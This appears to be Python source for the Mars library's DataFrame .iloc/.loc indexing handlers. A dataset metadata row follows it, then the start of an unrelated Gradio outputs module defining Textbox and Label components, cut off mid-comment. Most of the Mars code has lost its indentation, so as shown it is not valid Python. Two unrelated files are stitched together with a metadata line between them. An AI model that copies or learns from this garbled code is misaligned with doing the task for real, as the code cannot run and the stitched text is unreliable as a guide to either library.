class ChunkIndexInfo(ChunkIndexInfoBase):
def __init__(self):
super().__init__()
self.index_values = []
self.dtypes = None
def set(self, info: ChunkIndexAxisInfo):
super().set(info)
if getattr(info, 'index_value', None) is not None:
self.index_values.append(info.index_value)
if getattr(info, 'dtypes', None) is not None:
self.dtypes = info.dtypes
class FancyIndexInfo(IndexInfo):
def __init__(self,
index_type: IndexType,
input_axis: int,
output_axis: int,
raw_index,
handler):
super().__init__(index_type, input_axis, output_axis,
raw_index, handler)
# extra info for DataFrame fancy index
# split info
# - chunk_index_to_fancy_index_arrays
# - chunk_index_to_raw_positions
# - is_fancy_index_asc_sorted
self.split_info = None
class LabelFancyIndexInfo(IndexInfo):
def __init__(self,
index_type: IndexType,
input_axis: int,
output_axis: int,
raw_index,
handler):
super().__init__(index_type, input_axis, output_axis,
raw_index, handler)
# store chunk_index -> labels
self.chunk_index_to_labels = None
self.is_label_asc_sorted = None
class DataFrameIndexHandlerContext(IndexHandlerContext):
def set_tileable(self, tileable: TileableEntity):
for chunk in tileable.chunks:
self.chunk_index_to_info[chunk.index] = ChunkIndexInfo()
def concat_chunks(self,
chunks: List[Chunk],
axis: Union[Tuple[int], int]) -> Chunk:
dataframe_op_type = type(chunks[0].op)
# create tileable from chunks
concat_tileable = \
dataframe_op_type.create_tileable_from_chunks(chunks, inputs=chunks)
# concat chunks
chunk = dataframe_op_type.concat_tileable_chunks(concat_tileable).chunks[0]
if chunk.ndim > 1 and \
((isinstance(axis, tuple) and len(axis) == 1) or isinstance(axis, int)):
# adjust index and axis
axis = axis[0] if isinstance(axis, tuple) else axis
chunk.op._axis = axis
chunk_index = list(chunk.index)
chunk_index[1 - axis] = chunks[0].index[1 - axis]
chunk._index = tuple(chunk_index)
return chunk
def create_chunk(self,
chunk_index: Tuple[int],
chunk_index_info: ChunkIndexInfo) -> Chunk:
chunk_op = self.op.copy().reset_key()
chunk_op._indexes = indexes = chunk_index_info.indexes
chunk_op._stage = OperandStage.map
chunk_input = self.tileable.cix[chunk_index]
chunk_inputs = filter_inputs([chunk_input] + indexes)
kw = {}
kw['shape'] = shape = tuple(chunk_index_info.output_chunk_shape)
kw['index'] = tuple(chunk_index_info.output_chunk_index)
index_values = chunk_index_info.index_values
if len(shape) == 0:
# scalar
chunk_op._object_type = ObjectType.scalar
kw['dtype'] = self.op.outputs[0].dtype
elif len(shape) == 1:
# Series
chunk_op._object_type = ObjectType.series
kw['index_value'] = index_values[0]
kw['dtype'] = self.op.outputs[0].dtype
kw['name'] = getattr(self.op.outputs[0], 'name', None)
else:
# dataframe
chunk_op._object_type = ObjectType.dataframe
kw['index_value'] = index_values[0]
kw['columns_value'] = index_values[1]
kw['dtypes'] = chunk_index_info.dtypes
return chunk_op.new_chunk(chunk_inputs, kws=[kw])
class SliceIndexHandler(SliceIndexHandlerBase):
@classmethod
def set_chunk_index_info(cls,
context: IndexHandlerContext,
index_info: IndexInfo,
chunk_index: Tuple[int],
chunk_index_info: ChunkIndexInfo,
output_axis_index: int,
index,
output_shape: int):
tileable = context.tileable
chunk_input = tileable.cix[chunk_index]
slc = index
kw = {
'output_axis_index': output_axis_index,
'processed_index': slc,
'output_shape': output_shape,
'dtypes': None
}
if index_info.input_axis == 0:
index = chunk_input.index_value.to_pandas()
kw['index_value'] = parse_index(index[slc], chunk_input, slc,
store_data=False)
else:
assert index_info.input_axis == 1
index = chunk_input.columns_value.to_pandas()
# do not store index value if output axis is 0
store_data = True if index_info.output_axis == 1 else False
kw['index_value'] = parse_index(index[slc], store_data=store_data)
kw['dtypes'] = chunk_input.dtypes[slc]
chunk_index_info.set(ChunkIndexAxisInfo(**kw))
class LabelSliceIndexHandler(IndexHandler):
    @classmethod
    def accept(cls, raw_index):
return isinstance(raw_index, slice)
def parse(self,
raw_index,
context: IndexHandlerContext) -> IndexInfo:
info = IndexInfo(IndexType.label_slice,
context.input_axis,
context.output_axis,
raw_index,
self)
context.input_axis += 1
context.output_axis += 1
context.append(info)
return info
@staticmethod
def _slice_all(slc):
return slc.start is None and slc.stop is None and \
(slc.step is None or slc.step == 1)
def preprocess(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
tileable = context.tileable
input_axis = index_info.input_axis
index_value = [tileable.index_value, tileable.columns_value][input_axis]
# check if chunks have unknown shape
check = False
if index_value.has_value():
# index_value has value,
check = True
elif self._slice_all(index_info.raw_index):
# if slice on all data
check = True
if check:
if any(np.isnan(ns) for ns in tileable.nsplits[input_axis]):
raise TilesError('Input tileable {} has chunks with unknown shape '
'on axis {}'.format(tileable, input_axis))
    @classmethod
    def set_chunk_index_info(cls,
context: IndexHandlerContext,
index_info: IndexInfo,
chunk_index: Tuple[int],
chunk_index_info: ChunkIndexInfo,
output_axis_index: int,
index,
output_shape: int):
tileable = context.tileable
chunk_input = tileable.cix[chunk_index]
slc = index
kw = {
'output_axis_index': output_axis_index,
'processed_index': slc,
'output_shape': output_shape,
'dtypes': None
}
if index_info.input_axis == 0:
index = chunk_input.index_value.to_pandas()
start, stop = index.slice_locs(slc.start, slc.stop, slc.step, kind='loc')
pos_slc = slice(start, stop, slc.step)
kw['index_value'] = parse_index(index[pos_slc], chunk_input, slc,
store_data=False)
else:
assert index_info.input_axis == 1
dtypes = chunk_input.dtypes
# do not store index value if output axis is 0
store_data = True if index_info.output_axis == 1 else False
columns = dtypes.loc[slc].index
kw['index_value'] = parse_index(columns, store_data=store_data)
kw['dtypes'] = chunk_input.dtypes[slc]
chunk_index_info.set(ChunkIndexAxisInfo(**kw))
def _process_has_value_index(self,
tileable: TileableEntity,
index_info: IndexInfo,
index_value,
input_axis: int,
context: IndexHandlerContext) -> None:
pd_index = index_value.to_pandas()
if self._slice_all(index_info.raw_index):
slc = slice(None)
else:
# turn label-based slice into position-based slice
start, end = pd_index.slice_locs(index_info.raw_index.start,
index_info.raw_index.stop,
index_info.raw_index.step,
kind='loc')
slc = slice(start, end, index_info.raw_index.step)
cum_nsplit = [0] + np.cumsum(tileable.nsplits[index_info.input_axis]).tolist()
# split position-based slice into chunk slices
effected_i_to_slc = slice_split(slc, tileable.nsplits[index_info.input_axis])
is_reversed = (slc.step or 0) < 0
output_axis_index_range = range(len(effected_i_to_slc)) if not is_reversed else \
range(len(effected_i_to_slc) - 1, -1, -1)
other_index_to_iter = dict()
index_to_info = context.chunk_index_to_info.copy()
for chunk_index, chunk_index_info in index_to_info.items():
i = chunk_index[input_axis]
other_index = chunk_index[:input_axis] + chunk_index[input_axis + 1:]
size = tileable.nsplits[input_axis][i]
if i not in effected_i_to_slc:
# delete it, the input chunk could be ignored
del context.chunk_index_to_info[chunk_index]
else:
chunk_slc = effected_i_to_slc[i]
output_shape = calc_sliced_size(size, chunk_slc)
if other_index not in other_index_to_iter:
other_index_to_iter[other_index] = iter(output_axis_index_range)
output_axis_index = next(other_index_to_iter[other_index])
# turn position-based slice back into label-based slice
start = chunk_slc.start
if start is not None:
abs_start = cum_nsplit[i] + start
label_start = pd_index[abs_start]
else:
label_start = None
stop = chunk_slc.stop
if stop is not None:
                    abs_stop = cum_nsplit[i] + stop - 1  # label slice includes the stop
label_stop = pd_index[abs_stop] if abs_stop < len(pd_index) else None
else:
label_stop = None
label_slc = slice(label_start, label_stop, chunk_slc.step)
self.set_chunk_index_info(context, index_info, chunk_index, chunk_index_info,
output_axis_index, label_slc, output_shape)
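    # Illustrative note (not part of the original module): pandas label slices are inclusive
    # of the stop label (unlike positional slices), which is why the positional chunk stop is
    # shifted by one (`stop - 1`) above before being mapped back to a label.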
def process(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
tileable = context.tileable
input_axis = index_info.input_axis
index_value = [tileable.index_value, tileable.columns_value][input_axis]
if index_value.has_value() or self._slice_all(index_info.raw_index):
self._process_has_value_index(tileable, index_info,
index_value, input_axis, context)
else:
other_index_to_iter = dict()
# slice on all chunks on the specified axis
for chunk_index, chunk_index_info in context.chunk_index_to_info.items():
other_index = chunk_index[:1] if input_axis == 1 else chunk_index[1:]
if other_index not in other_index_to_iter:
other_index_to_iter[other_index] = itertools.count()
output_axis_index = next(other_index_to_iter[other_index])
self.set_chunk_index_info(context, index_info, chunk_index,
chunk_index_info, output_axis_index,
index_info.raw_index, np.nan)
class LabelIndexHandler(IndexHandler):
    @classmethod
    def accept(cls, raw_index):
# accept type other than slice, ndarray and tensor
return not isinstance(raw_index, (slice, np.ndarray, TENSOR_TYPE))
def parse(self,
raw_index,
context: IndexHandlerContext) -> IndexInfo:
tileable = context.tileable
input_axis = context.input_axis
if tileable.ndim == 2:
index_value = [tileable.index_value, tileable.columns_value][input_axis]
else:
index_value = tileable.index_value
if index_value.has_value():
pd_index = index_value.to_pandas()
loc = pd_index.get_loc(raw_index)
if isinstance(loc, slice):
# if is slice, means index not unique, but monotonic
# just call LabelSliceIndexHandler
new_raw_index = slice(raw_index, raw_index)
return LabelSliceIndexHandler.get_instance().parse(new_raw_index, context)
elif isinstance(loc, np.ndarray):
# bool indexing, non unique, and not monotonic
return NDArrayBoolIndexHandler.get_instance().parse(loc, context)
else:
return LabelNDArrayFancyIndexHandler.get_instance().parse(raw_index, context)
info = IndexInfo(IndexType.label,
context.input_axis,
context.output_axis,
raw_index,
self)
context.input_axis += 1
context.append(info)
return info
def preprocess(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
# if index has value on input axis,
# label will be converted to position,
# thus chunks cannot have unknown shape on this axis
tileable = context.tileable
input_axis = index_info.input_axis
if tileable.ndim == 1:
index_value = tileable.index_value
else:
index_value = [tileable.index_value, tileable.columns_value][input_axis]
if index_value.has_value():
if any(np.isnan(ns) for ns in tileable.nsplits[input_axis]):
raise TilesError('Input tileable {} has chunks with unknown shape '
'on axis {}'.format(tileable, input_axis))
def process(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
tileable = context.tileable
input_axis = index_info.input_axis
if tileable.ndim == 1:
index_value = tileable.index_value
else:
index_value = [tileable.index_value, tileable.columns_value][input_axis]
if index_value.has_value():
pd_index = index_value.to_pandas()
loc = pd_index.get_loc(index_info.raw_index)
# other situations have been delegated to different handlers
assert isinstance(loc, int)
effected_i_to_slc = slice_split(loc, tileable.nsplits[index_info.input_axis])
index_to_info = context.chunk_index_to_info.copy()
for chunk_index, chunk_index_info in index_to_info.items():
i = chunk_index[input_axis]
if i not in effected_i_to_slc:
# delete it, the input chunk could be ignored
del context.chunk_index_to_info[chunk_index]
else:
chunk_index_info.set(ChunkIndexAxisInfo(output_axis_index=None,
processed_index=index_info.raw_index,
output_shape=None,
index_value=None,
dtypes=None))
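# Illustration (plain pandas, not part of the Mars API): ``Index.get_loc``
# returns an int for a unique label, a slice for a non-unique but monotonic
# label, and a boolean ndarray otherwise; these are the three cases branched
# on in ``parse`` and ``process`` above.
def _get_loc_kinds_example():  # pragma: no cover - illustrative sketch only
    assert pd.Index(['a', 'b', 'c']).get_loc('b') == 1                 # unique -> int
    assert pd.Index(['a', 'b', 'b', 'c']).get_loc('b') == slice(1, 3)  # monotonic dup -> slice
    mask = pd.Index(['b', 'a', 'b']).get_loc('b')                      # non-monotonic dup -> ndarray
    assert mask.tolist() == [True, False, True]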
class DataFrameIndexHandler:
@classmethod
def set_chunk_index_info(cls,
context: IndexHandlerContext,
index_info: IndexInfo,
chunk_index: Tuple[int],
chunk_index_info: ChunkIndexInfo,
output_axis_index: int,
index,
output_shape: int):
tileable = context.tileable
chunk_input = tileable.cix[chunk_index]
dtypes = None
if index_info.input_axis == 0:
index_value = parse_index(chunk_input.index_value.to_pandas(),
chunk_input, index, store_data=False)
else:
dtypes = getattr(chunk_input.dtypes, cls.kind)[index]
columns = dtypes.index
index_value = parse_index(columns, store_data=True)
info = ChunkIndexAxisInfo(output_axis_index=output_axis_index,
processed_index=index,
output_shape=output_shape,
index_value=index_value,
dtypes=dtypes)
chunk_index_info.set(info)
class NDArrayBoolIndexHandler(NDArrayBoolIndexHandlerBase):
@classmethod
def set_chunk_index_info(cls,
context: IndexHandlerContext,
index_info: IndexInfo,
chunk_index: Tuple[int],
chunk_index_info: ChunkIndexInfo,
output_axis_index: int,
index,
output_shape: int):
tileable = context.tileable
chunk_input = tileable.cix[chunk_index]
if index_info.input_axis == 0:
dtype = chunk_input.index_value.to_pandas().dtype
index_value = parse_index(pd.Index([], dtype=dtype),
chunk_input, index, store_data=False)
dtypes = None
else:
pd_index = chunk_input.columns_value.to_pandas()
filtered_index = pd_index[index]
index_value = parse_index(filtered_index, store_data=True)
dtypes = chunk_input.dtypes[index]
info = ChunkIndexAxisInfo(output_axis_index=output_axis_index,
processed_index=index,
output_shape=output_shape,
index_value=index_value,
dtypes=dtypes)
chunk_index_info.set(info)
class TensorBoolIndexHandler(TensorBoolIndexHandlerBase):
@classmethod
def set_chunk_index_info(cls,
context: IndexHandlerContext,
index_info: IndexInfo,
chunk_index: Tuple[int],
chunk_index_info: ChunkIndexInfo,
output_axis_index: int,
index,
output_shape: int):
tileable = context.tileable
chunk_input = tileable.cix[chunk_index]
assert index_info.input_axis == 0, \
'bool indexing on axis columns cannot be tensor'
index_value = parse_index(pd.Index([], chunk_input.index_value.to_pandas().dtype),
chunk_input, index, store_data=False)
info = ChunkIndexAxisInfo(output_axis_index=output_axis_index,
processed_index=index,
output_shape=output_shape,
index_value=index_value,
dtypes=None)
chunk_index_info.set(info)
class _FancyIndexHandler(DataFrameIndexHandler, IndexHandler):
@classproperty
def kind(self): # pylint: disable=no-self-use
return 'iloc'
def parse(self,
raw_index,
context: IndexHandlerContext) -> IndexInfo:
info = FancyIndexInfo(IndexType.fancy_index,
context.input_axis,
context.output_axis,
raw_index,
self)
context.input_axis += 1
context.output_axis += 1
context.append(info)
return info
class NDArrayFancyIndexHandler(_FancyIndexHandler):
    @classmethod
    def accept(cls, raw_index):
# raw index like list, and pd.Series
# would have been converted to ndarray or tensor already
return isinstance(raw_index, np.ndarray) and \
raw_index.dtype != np.bool_
def preprocess(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
tileable = context.tileable
check_chunks_unknown_shape([tileable], TilesError)
# split raw index into chunks on the given axis
split_info = split_indexes_into_chunks([tileable.nsplits[index_info.input_axis]],
[index_info.raw_index])
index_info.split_info = split_info
def process(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
chunk_index_to_fancy_index_arrays = index_info.split_info[0]
other_index_to_iter = dict()
chunk_index_to_info = context.chunk_index_to_info.copy()
for chunk_index, chunk_index_info in chunk_index_to_info.items():
i = chunk_index[index_info.input_axis]
fancy_index_array = chunk_index_to_fancy_index_arrays[i, ][0]
if fancy_index_array.size == 0:
                # not affected
del context.chunk_index_to_info[chunk_index]
continue
other_index = chunk_index[:1] if index_info.input_axis == 1 else chunk_index[1:]
if other_index not in other_index_to_iter:
other_index_to_iter[other_index] = itertools.count()
output_axis_index = next(other_index_to_iter[other_index])
output_axis_shape = fancy_index_array.shape[0]
self.set_chunk_index_info(context, index_info, chunk_index,
chunk_index_info, output_axis_index,
fancy_index_array, output_axis_shape)
@classmethod
def need_postprocess(cls,
index_info: IndexInfo,
context: IndexHandlerContext):
tileable = context.tileable
if tileable.chunk_shape[index_info.input_axis] == 1:
# if tileable only has 1 chunk on this axis
# do not need postprocess
return False
# if ascending sorted, no need to postprocess
return not index_info.split_info[2]
def postprocess(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
# could be 2 fancy indexes at most
fancy_indexes = context.get_indexes(index_info.index_type)
i_fancy_index = fancy_indexes.index(index_info)
need_postprocesses = [fancy_index.handler.need_postprocess(fancy_index, context)
for fancy_index in fancy_indexes]
if not need_postprocesses[i_fancy_index]:
# do not need postprocess
return
if i_fancy_index == 0 and len(fancy_indexes) == 2 and need_postprocesses[1] and \
isinstance(fancy_indexes[1].raw_index, np.ndarray):
# check if need postprocess if 2 fancy indexes and now it's the first,
# if so, skip postprocess for this one,
# and do MapReduce just once for the second postprocess
return
chunks, nsplits = context.out_chunks, context.out_nsplits
index_to_chunks = {c.index: c for c in chunks}
to_concat_axes = tuple(fancy_index.output_axis
for i, fancy_index in enumerate(fancy_indexes)
if need_postprocesses[i])
reorder_indexes = [calc_pos(fancy_index.raw_index.shape, fancy_index.split_info[1])
for i, fancy_index in enumerate(fancy_indexes)
if need_postprocesses[i]]
new_out_chunks = []
for chunk_index in itertools.product(
*(range(len(ns)) for ax, ns in enumerate(nsplits)
if ax not in to_concat_axes)):
if len(to_concat_axes) == 2:
to_concat_chunks = chunks
else:
to_concat_chunks = []
for i in range(len(nsplits[to_concat_axes[0]])):
to_concat_index = list(chunk_index)
to_concat_index.insert(to_concat_axes[0], i)
to_concat_chunks.append(index_to_chunks[tuple(to_concat_index)])
concat_chunk = context.concat_chunks(to_concat_chunks, to_concat_axes)
reorder_chunk = self._create_reorder_chunk(concat_chunk, to_concat_axes,
reorder_indexes, context)
new_out_chunks.append(reorder_chunk)
new_nsplits = list(nsplits)
for fancy_index in fancy_indexes:
new_nsplits[fancy_index.output_axis] = (fancy_index.raw_index.shape[0],)
context.out_chunks = new_out_chunks
context.out_nsplits = new_nsplits
@classmethod
def _create_reorder_chunk(cls,
concat_chunk: Chunk,
to_concat_axes: Tuple,
reorder_indexes: List,
context: IndexHandlerContext):
reorder_chunk_op = context.op.copy().reset_key()
indexes = [slice(None)] * concat_chunk.ndim
for ax, reorder_index in zip(to_concat_axes, reorder_indexes):
indexes[ax] = reorder_index
reorder_chunk_op._indexes = indexes
params = concat_chunk.params
if isinstance(concat_chunk, SERIES_CHUNK_TYPE):
if concat_chunk.index_value.has_value():
# if concat chunk's index has value, we could calculate the new index
reorder_index = concat_chunk.index_value.to_pandas()[reorder_indexes[0]]
params['index_value'] = parse_index(reorder_index, store_data=True)
else:
params['index_value'] = parse_index(concat_chunk.index_value.to_pandas(), indexes)
return reorder_chunk_op.new_chunk([concat_chunk], kws=[params])
else:
if 0 in to_concat_axes:
if concat_chunk.index_value.has_value():
# if concat chunk's index has value, and index on axis 0,
# we could calculate the new index
reorder_index = concat_chunk.index_value.to_pandas()[reorder_indexes[0]]
params['index_value'] = parse_index(reorder_index, store_data=True)
else:
params['index_value'] = parse_index(concat_chunk.index_value.to_pandas(),
indexes[0])
if 1 in to_concat_axes:
reorder_columns = concat_chunk.columns_value.to_pandas()[reorder_indexes[-1]]
params['columns_value'] = parse_index(reorder_columns, store_data=True)
params['dtypes'] = concat_chunk.dtypes[reorder_indexes[-1]]
return reorder_chunk_op.new_chunk([concat_chunk], kws=[params])
class _LabelFancyIndexHandler(DataFrameIndexHandler, IndexHandler):
@classproperty
def kind(self): # pylint: disable=no-self-use
return 'loc'
class LabelNDArrayFancyIndexHandler(_LabelFancyIndexHandler):
    @classmethod
    def accept(cls, raw_index):
return isinstance(raw_index, np.ndarray) and \
raw_index.dtype != np.bool_
def parse(self,
raw_index,
context: IndexHandlerContext) -> IndexInfo:
info = LabelFancyIndexInfo(IndexType.label_fancy_index,
context.input_axis,
context.output_axis,
raw_index,
self)
context.input_axis += 1
if not np.isscalar(raw_index):
context.output_axis += 1
context.append(info)
return info
def preprocess(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
tileable = context.tileable
check_chunks_unknown_shape([tileable], TilesError)
input_axis = index_info.input_axis
if tileable.ndim == 2:
index_value = [tileable.index_value, tileable.columns_value][input_axis]
else:
index_value = tileable.index_value
cum_nsplit = [0] + np.cumsum(tileable.nsplits[input_axis]).tolist()
if index_value.has_value():
# turn label-based fancy index into position-based
pd_index = index_value.to_pandas()
positions = convert_labels_into_positions(pd_index, index_info.raw_index)
split_info = split_indexes_into_chunks([tileable.nsplits[input_axis]],
[positions])
chunk_index_to_pos = split_info[0]
is_asc_sorted = split_info[-1]
# convert back to labels for chunk_index
chunk_index_to_labels = dict()
for chunk_index, pos in chunk_index_to_pos.items():
# chunk_index and pos are all list with 1 element
abs_pos = pos[0] + cum_nsplit[chunk_index[0]]
chunk_labels = to_numpy(pd_index[abs_pos])
chunk_index_to_labels[chunk_index[0]] = chunk_labels
index_info.is_label_asc_sorted = is_asc_sorted
index_info.chunk_index_to_labels = chunk_index_to_labels
else:
index = index_info.raw_index
if np.isscalar(index):
# delegation from label index handler
index = np.atleast_1d(index)
# does not know the right positions, need postprocess always
index_info.is_label_asc_sorted = False
# do df.loc on each chunk
index_info.chunk_index_to_labels = \
{i: index for i in range(tileable.chunk_shape[input_axis])}
def process(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
tileable = context.tileable
input_axis = index_info.input_axis
chunk_index_to_labels = index_info.chunk_index_to_labels
other_index_to_iter = dict()
chunk_index_to_info = context.chunk_index_to_info.copy()
for chunk_index, chunk_index_info in chunk_index_to_info.items():
i = chunk_index[input_axis]
chunk_labels = chunk_index_to_labels[i]
size = chunk_labels.size
if size == 0:
                # not affected
del context.chunk_index_to_info[chunk_index]
continue
if np.isscalar(index_info.raw_index) and \
isinstance(tileable.index_value.value, IndexValue.DatetimeIndex) and \
isinstance(chunk_labels[0], str):
# special case when index is DatetimeIndex and loc by string
                # convert the list back to a scalar because keeping the list
                # would always raise KeyError
chunk_labels = chunk_labels[0].item()
other_index = chunk_index[:1] if input_axis == 1 else chunk_index[1:]
if other_index not in other_index_to_iter:
other_index_to_iter[other_index] = itertools.count()
output_axis_index = next(other_index_to_iter[other_index])
output_axis_shape = size
self.set_chunk_index_info(context, index_info, chunk_index,
chunk_index_info, output_axis_index,
chunk_labels, output_axis_shape)
@classmethod
def need_postprocess(cls,
index_info: IndexInfo,
context: IndexHandlerContext):
# if ascending sorted, no need to postprocess
return not index_info.is_label_asc_sorted
def postprocess(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
if not self.need_postprocess(index_info, context):
# do not need postprocess
return
chunks, nsplits = context.out_chunks, context.out_nsplits
index_to_chunks = {c.index: c for c in chunks}
axis = index_info.output_axis
new_out_chunks = []
chunk_axis_shapes = dict()
for chunk_index in itertools.product(*(range(len(ns)) for ax, ns in enumerate(nsplits)
if ax != axis)):
to_concat_chunks = []
for i in range(len(nsplits[axis])):
if axis == 0:
to_concat_index = (i,) + chunk_index
else:
to_concat_index = chunk_index + (i,)
to_concat_chunks.append(index_to_chunks[to_concat_index])
concat_chunk = context.concat_chunks(to_concat_chunks, axis)
chunk_op = context.op.copy().reset_key()
indexes = [slice(None)] * len(nsplits)
indexes[axis] = index_info.raw_index
params = concat_chunk.params
if np.isscalar(index_info.raw_index):
assert axis == 0
if 'columns_value' in params:
params['index_value'] = params.pop('columns_value')
params['dtype'] = find_common_type(params['dtypes'].tolist())
del params['dtypes']
if getattr(context.op.outputs[0], 'name', None) is not None:
params['name'] = context.op.outputs[0].name
if len(params['index']) == chunks[0].ndim:
index = list(params['index'])
index.pop(index_info.output_axis)
params['index'] = tuple(index)
shape = list(params['shape'])
shape.pop(index_info.output_axis)
params['shape'] = tuple(shape)
if context.op.outputs[0].ndim == 0:
del params['index_value']
elif axis == 0:
params['index_value'] = parse_index(pd.Index(index_info.raw_index), store_data=False)
else:
params['dtypes'] = dtypes = concat_chunk.dtypes.loc[index_info.raw_index]
params['columns_value'] = parse_index(dtypes.index, store_data=True)
shape = list(params['shape'])
shape[1] = len(dtypes)
chunk_op._indexes = indexes
out_chunk = chunk_op.new_chunk([concat_chunk], kws=[params])
if len(out_chunk.shape) != 0:
chunk_axis_shapes[out_chunk.index[axis]] = out_chunk.shape[axis]
new_out_chunks.append(out_chunk)
new_nsplits = list(nsplits)
if np.isscalar(index_info.raw_index):
new_nsplits = new_nsplits[:axis] + new_nsplits[axis + 1:]
else:
new_nsplits[axis] = (sum(chunk_axis_shapes.values()),)
context.out_chunks = new_out_chunks
context.out_nsplits = new_nsplits
class DataFrameIlocIndexesHandler(IndexesHandler):
def __init__(self):
super().__init__()
self.register(IntegralIndexHandler,
SliceIndexHandler,
NDArrayBoolIndexHandler,
TensorBoolIndexHandler,
NDArrayFancyIndexHandler)
def create_context(self, op):
return DataFrameIndexHandlerContext(op)
class DataFrameLocIndexesHandler(IndexesHandler):
def __init__(self):
super().__init__()
self.register(LabelIndexHandler,
LabelSliceIndexHandler,
NDArrayBoolIndexHandler,
TensorBoolIndexHandler,
LabelNDArrayFancyIndexHandler)
def create_context(self, op):
return DataFrameIndexHandlerContext(op)
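# Rough mapping (illustrative sketch only, expressed in plain pandas) of the
# ``.loc`` index kinds handled by the handlers registered above:
def _loc_handler_kinds_example():  # pragma: no cover - illustrative sketch only
    df = pd.DataFrame({'a': [1, 2, 3]}, index=['x', 'y', 'z'])
    df.loc['x']                               # LabelIndexHandler
    df.loc['x':'y']                           # LabelSliceIndexHandler
    df.loc[np.array([True, False, True])]     # NDArrayBoolIndexHandler
    df.loc[np.array(['x', 'z'])]              # LabelNDArrayFancyIndexHandler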
avg_line_length: 43.476404 | max_line_length: 101 | alphanum_fraction: 0.5804
hexsha: b4bec518a3d7310d718870c5b0307edeb03cc55f | size: 28,305 | ext: py | lang: Python
max_stars/max_issues/max_forks repo_path: gradio/outputs.py | repo_name: LysandreJik/gradio | repo_head_hexsha: 64dfcbd390c115d0abe42cd25c69c1384701973c | repo_licenses: ["Apache-2.0"]
max_stars_count / max_issues_count / max_forks_count: null | event datetimes: null
"""
This module defines various classes that can serve as the `output` to an interface. Each class must inherit from
`OutputComponent`, and each class must define a path to its template. All of the subclasses of `OutputComponent` are
automatically added to a registry, which allows them to be easily referenced in other parts of the code.
"""
from __future__ import annotations
import json
import operator
import os
import tempfile
import warnings
from numbers import Number
from types import ModuleType
from typing import TYPE_CHECKING, Any, Callable, Dict, List, Optional, Tuple
import numpy as np
import pandas as pd
import PIL
from ffmpy import FFmpeg
from gradio import processing_utils
from gradio.component import Component
if TYPE_CHECKING: # Only import for type checking (is False at runtime).
from gradio import Interface
class OutputComponent(Component):
"""
Output Component. All output components subclass this.
"""
def postprocess(self, y):
"""
Any postprocessing needed to be performed on function output.
"""
return y
def deserialize(self, x):
"""
        Convert the serialized output of a call() to the interface (e.g. a base64 representation) into a human-readable version of the output (path of an image, etc.)
"""
return x
class Textbox(OutputComponent):
"""
Component creates a textbox to render output text or number.
Output type: Union[str, float, int]
Demos: hello_world, sentence_builder
"""
def __init__(self, type: str = "auto", label: Optional[str] = None):
"""
Parameters:
type (str): Type of value to be passed to component. "str" expects a string, "number" expects a float value, "auto" detects return type.
label (str): component name in interface.
"""
self.type = type
super().__init__(label)
def get_template_context(self):
return {**super().get_template_context()}
@classmethod
def get_shortcut_implementations(cls):
return {
"text": {"type": "str"},
"textbox": {"type": "str"},
"number": {"type": "number"},
}
def postprocess(self, y):
"""
Parameters:
y (str): text output
Returns:
(Union[str, number]): output value
"""
if self.type == "str" or self.type == "auto":
return str(y)
elif self.type == "number":
return y
else:
raise ValueError(
"Unknown type: " + self.type + ". Please choose from: 'str', 'number'"
)
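# Usage sketch (illustrative only, not part of the library surface): how the
# explicit ``type`` settings affect ``Textbox.postprocess``.
def _example_textbox_postprocess():  # pragma: no cover - illustrative sketch only
    numeric_out = Textbox(type="number", label="score")
    text_out = Textbox(label="message")  # type defaults to "auto"
    assert numeric_out.postprocess(3.5) == 3.5
    assert text_out.postprocess(3.5) == "3.5"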
class Label(OutputComponent):
"""
Component outputs a classification label, along with confidence scores of top categories if provided. Confidence scores are represented as a dictionary mapping labels to scores between 0 and 1.
Output type: Union[Dict[str, float], str, int, float]
Demos: image_classifier, main_note, titanic_survival
"""
CONFIDENCES_KEY = "confidences"
def __init__(
self,
num_top_classes: Optional[int] = None,
type: str = "auto",
label: Optional[str] = None,
):
"""
Parameters:
num_top_classes (int): number of most confident classes to show.
        type (str): Type of value to be passed to component. "label" expects a single label, "confidences" expects a dictionary mapping labels to confidence scores, "auto" detects return type.
label (str): component name in interface.
"""
self.num_top_classes = num_top_classes
self.type = type
super().__init__(label)
def postprocess(self, y):
"""
Parameters:
y (Dict[str, float]): dictionary mapping label to confidence value
Returns:
(Dict[label: str, confidences: List[Dict[label: str, confidence: number]]]): Object with key 'label' representing primary label, and key 'confidences' representing a list of label-confidence pairs
"""
if self.type == "label" or (
self.type == "auto" and (isinstance(y, str) or isinstance(y, Number))
):
return {"label": str(y)}
elif self.type == "confidences" or (
self.type == "auto" and isinstance(y, dict)
):
sorted_pred = sorted(y.items(), key=operator.itemgetter(1), reverse=True)
if self.num_top_classes is not None:
sorted_pred = sorted_pred[: self.num_top_classes]
return {
"label": sorted_pred[0][0],
"confidences": [
{"label": pred[0], "confidence": pred[1]} for pred in sorted_pred
],
}
else:
raise ValueError(
"The `Label` output interface expects one of: a string label, or an int label, a "
"float label, or a dictionary whose keys are labels and values are confidences."
)
def deserialize(self, y):
# 5 cases: (1): {'label': 'lion'}, {'label': 'lion', 'confidences':...}, {'lion': 0.46, ...}, 'lion', '0.46'
if self.type == "label" or (
self.type == "auto"
and (
isinstance(y, str)
or isinstance(y, int)
or isinstance(y, float)
or ("label" in y and not ("confidences" in y.keys()))
)
):
if isinstance(y, str) or isinstance(y, int) or isinstance(y, float):
return y
else:
return y["label"]
elif self.type == "confidences" or self.type == "auto":
if ("confidences" in y.keys()) and isinstance(y["confidences"], list):
return {k["label"]: k["confidence"] for k in y["confidences"]}
else:
return y
raise ValueError("Unable to deserialize output: {}".format(y))
@classmethod
def get_shortcut_implementations(cls):
return {
"label": {},
}
def save_flagged(self, dir, label, data, encryption_key):
"""
Returns: (Union[str, Dict[str, number]]): Either a string representing the main category label, or a dictionary with category keys mapping to confidence levels.
"""
if "confidences" in data:
return json.dumps(
{
example["label"]: example["confidence"]
for example in data["confidences"]
}
)
else:
return data["label"]
def restore_flagged(self, dir, data, encryption_key):
try:
data = json.loads(data)
return self.postprocess(data)
except ValueError:
return data
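# Usage sketch (illustrative only): ``Label.postprocess`` wraps a plain label,
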